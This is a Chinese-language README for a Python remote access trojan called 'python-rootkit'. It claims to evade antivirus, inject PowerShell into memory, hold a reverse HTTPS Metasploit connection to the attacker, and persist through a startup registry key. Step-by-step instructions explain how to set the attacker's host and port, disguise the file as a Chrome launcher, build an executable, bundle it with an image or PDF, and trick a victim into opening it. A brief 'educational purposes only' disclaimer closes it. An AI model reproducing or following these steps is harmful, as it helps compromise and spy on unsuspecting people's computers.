python-rootkit
这是一个完全无法检测的Python远程访问木马(RAT),能够绕过几乎所有杀毒软件,在任何Windows机器上打开后门,并与你的监听机器建立反向HTTPS Metasploit连接。
ViRu5生命周期
- 绕过所有杀毒软件。
- 将恶意PowerShell脚本注入内存。
- 与攻击者机器建立反向HTTPS连接。
- 每10秒检查一次连接是否仍然存在,如果不存在,则重新建立新连接。
- 添加启动注册表键,以便重启后重新连接到攻击者。
步骤
- 更新viRu5/source.py中的参数,设置你的lhost和lport
- 将source.py重命名为GoogleChromeAutoLaunch.py
- 将GoogleChromeAutoLaunch.py、setup.py以及你的图标文件icon.ico放到c:\python27目录下
- 在cmd中执行
cd c:\python27 && python setup.py py2exe
- 在Dist目录中找到RAT文件。
- 将其与任何图片、PDF、Word或其他类型的文件捆绑
- 发送给受害者
- 运用你的社会工程学技巧让他打开文件
- 你将收到一个反向HTTPS Metasploit连接 :)
测试环境
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
致谢
感谢每一位花时间帮助他人、让社区变得更强大的安全研究员。感谢PowerShellEmpire团队。
免责声明
本工具仅用于教育目的。首先,此代码旨在提醒人们注意未修补机器可能感染的安全问题。